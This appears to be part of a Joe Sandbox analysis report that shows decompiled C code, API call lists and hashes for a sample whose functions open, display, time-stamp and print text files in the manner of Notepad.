                                                  • Instruction Fuzzy Hash: BEE09231A11607A6D7117BF88C01BDE7AA17F21374FED4255E1A4EF2C1CFB89E019651
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A3542 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 210 10a3542-10a3556 call 10a347e
                                                  C-Code - Quality: 25%
                                                  			E010A3542(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t11;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E010A347E(_t4, _t5, _t6, _t7, _t8, _t11); // executed
				return _t3;
			}











                                                  0x010a3545
                                                  0x010a3547
                                                  0x010a354a
                                                  0x010a354d
                                                  0x010a3556

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __fsopen
                                                  • String ID:
                                                  • API String ID: 3646066109-0
                                                  • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                  • Instruction ID: 5b134e968a5a27c46262d4bfe97b94f4c03f3dab7c044ce7a1d92296938da62e
                                                  • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                  • Instruction Fuzzy Hash: 65B0927644020C77CE022AC2EC02A993B19AB51660F408020FB4C1C560EA73A6A09689
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 010A1140 Relevance: 54.5, APIs: 30, Strings: 1, Instructions: 261memorywindowfileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E010A1140(WCHAR* __ecx, int __edx) {
				long _v8;
				long _v12;
				int _v16;
				short _v28;
				int _t26;
				long _t27;
				int _t33;
				void* _t36;
				signed int _t37;
				int _t56;
				long _t60;
				void _t66;
				int _t68;
				int _t73;
				void* _t74;
				int _t77;
				short _t78;
				WCHAR* _t84;
				void* _t85;
				int _t87;
				int _t88;
				void* _t89;
				void* _t92;
				void* _t93;

				_t73 = __edx;
				_t84 = __ecx;
				_t88 = GetWindowTextLengthW( *0x10c3f2c);
				if(SendMessageW( *0x10c3f2c, 0xb8, 0, 0) == 0) {
					L9:
					_t26 = CreateFileW(_t84, 0x80000000, 3, 0, 3, 0x80, 0);
					_t85 = _t26;
					if(_t85 == 0xffffffff) {
						goto L43;
					} else {
						_t27 = GetFileSize(_t85, 0);
						_v8 = _t27;
						if(_t27 != 0xffffffff) {
							_t89 = HeapAlloc(GetProcessHeap(), 0, _t27 + 2);
							if(_t89 == 0) {
								goto L11;
							} else {
								_t33 = ReadFile(_t85, _t89, _v8,  &_v12, 0);
								_push(_t85);
								if(_t33 != 0) {
									CloseHandle();
									_t77 = _v12;
									_v8 = _t77;
									if(_t73 != 0xffffffff) {
										if(_t77 >= 2 && (_t73 == 1 || _t73 == 2)) {
											_t66 =  *_t89;
											if(_t66 != 0xff ||  *((char*)(_t89 + 1)) != 0xfe) {
												if(_t66 == 0xfe) {
													_t73 =  ==  ? 2 : _t73;
												}
											} else {
												_t73 = 1;
											}
										}
									} else {
										_t68 = E010A10E0(_t89, _t77);
										_t77 = _v8;
										_t73 = _t68;
									}
									_t36 = _t73 - 1;
									if(_t36 == 0 || _t36 == 1) {
										_t74 = _t89;
										_t87 = _t77 >> 1;
										goto L31;
									} else {
										_t56 =  ==  ? 0xfde9 : 0;
										_v16 = _t56;
										_t87 = MultiByteToWideChar(_t56, 0, _t89, _t77, 0, 0);
										_t60 = HeapAlloc(GetProcessHeap(), 0, 2 + _t87 * 2);
										_t74 = _t60;
										if(_t74 != 0) {
											MultiByteToWideChar(_v16, 0, _t89, _v8, _t74, _t87);
											HeapFree(GetProcessHeap(), 0, _t89);
											L31:
											_t37 = 0;
											if(_t87 > 0) {
												_t14 = _t37 + 0x20; // 0x20
												_t78 = _t14;
												do {
													if( *((short*)(_t74 + _t37 * 2)) == 0) {
														 *((short*)(_t74 + _t37 * 2)) = _t78;
													}
													_t37 = _t37 + 1;
												} while (_t37 < _t87);
											}
											 *((short*)(_t74 + _t87 * 2)) = 0;
											if(_t87 < 1 ||  *_t74 != 0xfeff) {
												_push(_t74);
											} else {
												_t21 = _t74 + 2; // 0x2
											}
											SetWindowTextW( *0x10c3f2c, ??);
											HeapFree(GetProcessHeap(), 0, _t74);
											SendMessageW( *0x10c3f2c, 0xb9, 0, 0);
											SendMessageW( *0x10c3f2c, 0xcd, 0, 0);
											SetFocus( *0x10c3f2c);
											_t26 = GetWindowTextW( *0x10c3f2c,  &_v28, 0);
											if(_t26 != 0) {
												_t26 = lstrcmpW( &_v28, L".LOG");
												if(_t26 == 0) {
													SendMessageW( *0x10c3f2c, 0xb1, GetWindowTextLengthW( *0x10c3f2c), 0xffffffff);
													SendMessageW( *0x10c3f2c, 0xc2, 1, L"\r\n");
													E010A2150();
													return SendMessageW( *0x10c3f2c, 0xc2, 1, L"\r\n");
												}
											}
											goto L43;
										} else {
											return HeapFree(GetProcessHeap(), _t60, _t89);
										}
									}
								} else {
									CloseHandle();
									return HeapFree(GetProcessHeap(), 0, _t89);
								}
							}
						} else {
							L11:
							return CloseHandle(_t85);
						}
					}
				} else {
					_t26 =  *0x10c43b0;
					if(_t88 != 0 || _t26 != 0) {
						_t92 = _t88 - 2;
						if(_t92 == 0) {
							L43:
							return _t26;
						} else {
							_t93 = _t92 - 4;
							if(_t93 == 0) {
								if(_t26 != 0) {
									goto L9;
								} else {
									_t26 = E010A1770();
									if(_t26 == 0) {
										goto L43;
									} else {
										goto L9;
									}
								}
							} else {
								if(_t93 == 1) {
									goto L9;
								} else {
									return _t26;
								}
							}
						}
					} else {
						goto L9;
					}
				}
			}



























                                                  0x010a114f
                                                  0x010a1151
                                                  0x010a1168
                                                  0x010a1172
                                                  0x010a11ad
                                                  0x010a11c0
                                                  0x010a11c6
                                                  0x010a11cb
                                                  0x00000000
                                                  0x010a11d1
                                                  0x010a11d4
                                                  0x010a11da
                                                  0x010a11e0
                                                  0x010a1203
                                                  0x010a1207
                                                  0x00000000
                                                  0x010a1209
                                                  0x010a1214
                                                  0x010a121a
                                                  0x010a121d
                                                  0x010a123d
                                                  0x010a1243
                                                  0x010a1246
                                                  0x010a124c
                                                  0x010a1261
                                                  0x010a126d
                                                  0x010a1271
                                                  0x010a1282
                                                  0x010a128d
                                                  0x010a128d
                                                  0x010a1279
                                                  0x010a1279
                                                  0x010a1279
                                                  0x010a1271
                                                  0x010a124e
                                                  0x010a1252
                                                  0x010a1257
                                                  0x010a125a
                                                  0x010a125a
                                                  0x010a1292
                                                  0x010a1293
                                                  0x010a1314
                                                  0x010a131c
                                                  0x00000000
                                                  0x010a1298
                                                  0x010a12a8
                                                  0x010a12ae
                                                  0x010a12b7
                                                  0x010a12cb
                                                  0x010a12d1
                                                  0x010a12d5
                                                  0x010a12f8
                                                  0x010a130a
                                                  0x010a131e
                                                  0x010a131e
                                                  0x010a1322
                                                  0x010a1324
                                                  0x010a1324
                                                  0x010a1327
                                                  0x010a132c
                                                  0x010a132e
                                                  0x010a132e
                                                  0x010a1332
                                                  0x010a1333
                                                  0x010a1327
                                                  0x010a1339
                                                  0x010a1340
                                                  0x010a1352
                                                  0x010a134c
                                                  0x010a134c
                                                  0x010a134f
                                                  0x010a1359
                                                  0x010a1365
                                                  0x010a1380
                                                  0x010a1391
                                                  0x010a1399
                                                  0x010a13ab
                                                  0x010a13b3
                                                  0x010a13be
                                                  0x010a13c6
                                                  0x010a13e2
                                                  0x010a13f6
                                                  0x010a13f8
                                                  0x00000000
                                                  0x010a140f
                                                  0x010a13c6
                                                  0x00000000
                                                  0x010a12d7
                                                  0x010a12ec
                                                  0x010a12ec
                                                  0x010a12d5
                                                  0x010a121f
                                                  0x010a121f
                                                  0x010a123c
                                                  0x010a123c
                                                  0x010a121d
                                                  0x010a11e2
                                                  0x010a11e2
                                                  0x010a11ef
                                                  0x010a11ef
                                                  0x010a11e0
                                                  0x010a1174
                                                  0x010a1174
                                                  0x010a117c
                                                  0x010a1183
                                                  0x010a1186
                                                  0x010a1417
                                                  0x010a1417
                                                  0x010a118c
                                                  0x010a118c
                                                  0x010a118f
                                                  0x010a119e
                                                  0x00000000
                                                  0x010a11a0
                                                  0x010a11a0
                                                  0x010a11a7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a11a7
                                                  0x010a1191
                                                  0x010a1192
                                                  0x00000000
                                                  0x010a119a
                                                  0x010a119a
                                                  0x010a119a
                                                  0x010a1192
                                                  0x010a118f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a117c

                                                  APIs
                                                  • GetWindowTextLengthW.USER32 ref: 010A1153
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A116A
                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11C0
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11D4
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11E3
                                                  • GetProcessHeap.KERNEL32(00000000,-00000002,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11F6
                                                  • HeapAlloc.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11FD
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1214
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A121F
                                                  • HeapFree.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1230
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A123D
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12B1
                                                  • HeapAlloc.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12CB
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12D9
                                                  • HeapFree.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12E0
                                                    • Part of subcall function 010A1770: _memset.LIBCMT ref: 010A1781
                                                    • Part of subcall function 010A1770: lstrcpyW.KERNEL32 ref: 010A1795
                                                    • Part of subcall function 010A1770: GetSaveFileNameW.COMDLG32(?), ref: 010A17FD
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12F8
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1307
                                                  • HeapFree.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A130A
                                                  • SetWindowTextW.USER32(00000000), ref: 010A1359
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1362
                                                  • HeapFree.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1365
                                                  • SendMessageW.USER32(000000B9,00000000,00000000), ref: 010A1380
                                                  • SendMessageW.USER32(000000CD,00000000,00000000), ref: 010A1391
                                                  • SetFocus.USER32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1399
                                                  • GetWindowTextW.USER32 ref: 010A13AB
                                                  • lstrcmpW.KERNEL32(?,.LOG,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A13BE
                                                  • GetWindowTextLengthW.USER32(000000FF), ref: 010A13D0
                                                  • SendMessageW.USER32(000000B1,00000000,?,80000000), ref: 010A13E2
                                                  • SendMessageW.USER32(000000C2,00000001,010BEE24), ref: 010A13F6
                                                  • SendMessageW.USER32(000000C2,00000001,010BEE24), ref: 010A140F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Heap$MessageSend$FileFreeProcessTextWindow$CloseHandle$AllocByteCharLengthMultiWide$CreateFocusNameReadSaveSize_memsetlstrcmplstrcpy
                                                  • String ID: .LOG
                                                  • API String ID: 597183282-2272326732
                                                  • Opcode ID: 9e0341d5d14a1de73616a7d6ef55f6286cb74d53c09b4e71e600cb12abdac55c
                                                  • Instruction ID: f1d4bd0fd3d428322d88ab0b2ab9a28689df52f255d06a9da6523ac5bdf679e1
                                                  • Opcode Fuzzy Hash: 9e0341d5d14a1de73616a7d6ef55f6286cb74d53c09b4e71e600cb12abdac55c
                                                  • Instruction Fuzzy Hash: 2F81E832640205BBFB315BF8ADC9FEA3B79EB45750F508961FAC5EA1C4CB7688018B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2150 Relevance: 9.0, APIs: 6, Instructions: 47windowtimeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2150() {
				struct _SYSTEMTIME _v20;
				void* _v532;

				GetLocalTime( &_v20);
				GetTimeFormatW(0x400, 2,  &_v20, 0,  &_v532, 0xff);
				SendMessageW( *0x10c3f2c, 0xc2, 1,  &_v532);
				SendMessageW( *0x10c3f2c, 0xc2, 1, " ");
				GetDateFormatW(0x400, 0,  &_v20, 0,  &_v532, 0xff);
				return SendMessageW( *0x10c3f2c, 0xc2, 1,  &_v532);
			}





                                                  0x010a215e
                                                  0x010a217d
                                                  0x010a219d
                                                  0x010a21b1
                                                  0x010a21cc
                                                  0x010a21ec

                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000,77294F20), ref: 010A215E
                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,00000000,00000000,?,000000FF), ref: 010A217D
                                                  • SendMessageW.USER32(000000C2,00000001,?), ref: 010A219D
                                                  • SendMessageW.USER32(000000C2,00000001,010BEDFC), ref: 010A21B1
                                                  • GetDateFormatW.KERNEL32(00000400,00000000,00000000,00000000,?,000000FF), ref: 010A21CC
                                                  • SendMessageW.USER32(000000C2,00000001,?), ref: 010A21E6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$FormatTime$DateLocal
                                                  • String ID:
                                                  • API String ID: 3786825601-0
                                                  • Opcode ID: 4c53d80ad96bfb725ab84d6737266984cd0e07f0c1d4e6ebcd1291552bf2d7b2
                                                  • Instruction ID: 51cc3ee393fc0099b39dce032dd071cfa4b8e262eeb9e25468842e6ea0398814
                                                  • Opcode Fuzzy Hash: 4c53d80ad96bfb725ab84d6737266984cd0e07f0c1d4e6ebcd1291552bf2d7b2
                                                  • Instruction Fuzzy Hash: 0201087269021EBAFB30EB90DC8AFFA7B7CEB04B00F444865B754AA0C0D6E659458B51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A816D Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A816D(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                  0x010a8172
                                                  0x010a8182

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010A3FCB,?,?,?,00000000), ref: 010A8172
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 010A817B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 91d3b440163b426f06caa4e1e443cf54077b409dd56aa78a25c0d55a0f24899e
                                                  • Instruction ID: 5461a0c5a44206bbf9b91fb9c7ff0a8363933e3463cfacb1a848a41ffe5345fd
                                                  • Opcode Fuzzy Hash: 91d3b440163b426f06caa4e1e443cf54077b409dd56aa78a25c0d55a0f24899e
                                                  • Instruction Fuzzy Hash: 6CB09231454209ABEB202BD1EA89B983F28EB06656F000018FA4D54054AB6754908B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010AF43E Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumSystemLocalesEx.KERNEL32(?,?,?,00000000), ref: 010AF44C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2099609381-0
                                                  • Opcode ID: fe063e91d98c4c89d873b346c279517a9968d5a91afba9f089fea825aac43351
                                                  • Instruction ID: b3ca74a3cc52d5736554e22f1edbfb761d554ccc406f0108cfb3849534c5c090
                                                  • Opcode Fuzzy Hash: fe063e91d98c4c89d873b346c279517a9968d5a91afba9f089fea825aac43351
                                                  • Instruction Fuzzy Hash: 7FC0483204020DBBEF121E85EC05BD93F2AEB09661F008410FA18980608773A661AB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010AF473 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoEx.KERNEL32(?,?,00000002,?,?,010A90CA,?,?,?,00000002), ref: 010AF482
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 0369067c0b1d466139f41d112985df96f9b769125b2a9e39a4c137fc4ae2edcf
                                                  • Instruction ID: 389222b38b1c8904305da17d4704895f600d6ce856bba24172c72a72dbcf676b
                                                  • Opcode Fuzzy Hash: 0369067c0b1d466139f41d112985df96f9b769125b2a9e39a4c137fc4ae2edcf
                                                  • Instruction Fuzzy Hash: A1C0483200020DFBCF025F95ED049DA3F2AFB09264B048010FA1C04021C7739930AB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A814A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A814A(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                                                  0x010a8157

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?,?,010A76D0,010A7685), ref: 010A8150
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: e1124996c28b10044328f0f38cd386c8f04fb7aa25cebb8dbd02bb792ea26e76
                                                  • Instruction ID: 0f8ad7942cad8e79861ff822c12efa28907174feb37662f370a3491f858f182f
                                                  • Opcode Fuzzy Hash: e1124996c28b10044328f0f38cd386c8f04fb7aa25cebb8dbd02bb792ea26e76
                                                  • Instruction Fuzzy Hash: 17A0223000020CFBCF202F82FC088C83F2CFB022A8B000020F80C00020EB33A8A08BC8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1CB0 Relevance: 68.5, APIs: 33, Strings: 6, Instructions: 241memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E010A1CB0() {
				signed int _v8;
				int _v12;
				void* _v16;
				intOrPtr _v50;
				signed int _v52;
				intOrPtr _v56;
				signed int _v58;
				signed short _v60;
				signed int _v64;
				struct HDC__* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				struct tagPD _v84;
				void* _v88;
				long _v92;
				char* _v96;
				signed int _v100;
				void* _v104;
				struct _DOCINFOW _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v168;
				intOrPtr _v176;
				signed char _v196;
				signed int _v200;
				intOrPtr _v224;
				struct tagOFNA _v228;
				struct tagLOGFONTW _v320;
				char _v1320;
				signed int _t102;
				signed int _t112;
				int _t117;
				int _t120;
				int _t124;
				int _t127;
				int _t132;
				void* _t134;
				void* _t135;
				signed int _t141;
				signed int _t153;
				void* _t156;
				signed int _t162;
				signed int _t166;
				int _t173;
				int _t176;
				int _t185;
				void* _t187;
				void* _t188;

				E010A66E0( &_v84, 0, 0x42);
				_v80 =  *0x10c3f24;
				_v76 =  *0x10c510c;
				_v72 =  *0x10c5110;
				_v50 =  *0x10c3f20;
				_t188 = _t187 + 0xc;
				_v60 = 0;
				_v52 = 0;
				_v84 = 0x42;
				_v64 = 0x104;
				_v56 = 0xffff0001;
				_t102 = PrintDlgW( &_v84);
				if(_t102 == 0) {
					L19:
					return _t102;
				} else {
					 *0x10c510c = _v76;
					 *0x10c5110 = _v72;
					SetMapMode(_v68, 1);
					_v124.cbSize = 0x14;
					_v124.lpszDocName = 0x10c45b8;
					_v124.lpszOutput = 0;
					_v124.lpszDatatype = 0;
					_v124.fwType = 0;
					if((_v64 & 0x00000020) == 0) {
						L3:
						_t33 = GetWindowTextLengthW( *0x10c3f2c) + 1; // 0x1
						_t176 = _t33;
						_t156 = HeapAlloc(GetProcessHeap(), 0, _t176 + _t176);
						_v16 = _t156;
						if(_t156 != 0) {
							_v8 = GetWindowTextW( *0x10c3f2c, _t156, _t176);
							_t112 = StartDocW(_v68,  &_v124);
							__eflags = _t112;
							if(_t112 <= 0) {
								L18:
								DeleteDC(_v68);
								return HeapFree(GetProcessHeap(), 0, _t156);
							}
							_t117 = MulDiv( *0x10c4c90, GetDeviceCaps(_v68, 0x5a), 0x9ec);
							_v136 = _t117 - GetDeviceCaps(_v68, 0x71);
							_t120 = MulDiv( *0x10c4c94, GetDeviceCaps(_v68, 0x5a), 0x9ec);
							_v128 = GetDeviceCaps(_v68, 0x6f) - _t120;
							_t124 = MulDiv( *0x10c4c98, GetDeviceCaps(_v68, 0x58), 0x9ec);
							_v140 = _t124 - GetDeviceCaps(_v68, 0x70);
							_t127 = MulDiv( *0x10c4c9c, GetDeviceCaps(_v68, 0x58), 0x9ec);
							_v132 = GetDeviceCaps(_v68, 0x6e) - _t127;
							memcpy( &_v320, 0x10c3f40, 0x17 << 2);
							_t132 = MulDiv(_v320.lfHeight, GetDeviceCaps(_v68, 0x5a), _v12);
							_v320.lfWeight = _v320.lfWeight - 0x64;
							_v320 = _t132;
							_t134 = CreateFontIndirectW( &_v320);
							_v12 = _t134;
							_t135 = SelectObject(_v68, _t134);
							_t156 = _v16;
							_t173 = 1;
							_v88 = _t135;
							__eflags = 1 - _v52;
							if(1 > _v52) {
								L17:
								EndDoc(_v68);
								SelectObject(_v68, _v88);
								DeleteObject(_v12);
								goto L18;
							}
							_t166 = 0;
							__eflags = 0;
							_t141 = _t156 + _v8 * 2;
							_v8 = _t141;
							do {
								_v100 = _t141;
								_t185 = 1;
								_v104 = _t156;
								_v96 =  &_v1320;
								_v92 = 0;
								do {
									__eflags = _v64 & 0x00000002;
									if(__eflags == 0) {
										_t162 = 1;
										L13:
										_t166 = E010A1980(_v68,  &_v140, __eflags, _t162, _t185,  &_v104);
										_t185 = _t185 + 1;
										__eflags = _t166;
										if(_t166 == 0) {
											goto L17;
										}
										goto L14;
									}
									__eflags = _t185 - (_v58 & 0x0000ffff);
									if(_t185 > (_v58 & 0x0000ffff)) {
										break;
									}
									__eflags = _t185 - (_v60 & 0x0000ffff);
									_t162 = 0 | __eflags >= 0x00000000;
									goto L13;
									L14:
									__eflags = _v104 - _v100;
								} while (_v104 < _v100);
								__eflags = _t166;
								if(_t166 == 0) {
									goto L17;
								}
								_t173 = _t173 + 1;
								__eflags = _t173 - (_v52 & 0x0000ffff);
								_t141 = _v8;
							} while (_t173 <= (_v52 & 0x0000ffff));
							goto L17;
						}
						return DeleteDC(_v68);
					} else {
						E010A66E0( &_v228, 0, 0x58);
						_t188 = _t188 + 0xc;
						_v224 = _v80;
						_v228 = 0x58;
						_v176 = 0x806;
						_v200 = L"output.prn";
						_v196 = 0x104;
						_v168 = L"prn";
						_t153 = GetSaveFileNameW( &_v228);
						asm("sbb eax, eax");
						_t102 =  ~_t153 & L"output.prn";
						_v124.lpszOutput = _t102;
						if(_t102 == 0) {
							goto L19;
						} else {
							goto L3;
						}
					}
				}
			}






















































                                                  0x010a1cc1
                                                  0x010a1ccb
                                                  0x010a1cd3
                                                  0x010a1cdb
                                                  0x010a1ce3
                                                  0x010a1ce8
                                                  0x010a1ceb
                                                  0x010a1cee
                                                  0x010a1cf6
                                                  0x010a1cfd
                                                  0x010a1d04
                                                  0x010a1d0b
                                                  0x010a1d13
                                                  0x010a1ff0
                                                  0x010a1ff0
                                                  0x010a1d19
                                                  0x010a1d21
                                                  0x010a1d29
                                                  0x010a1d2e
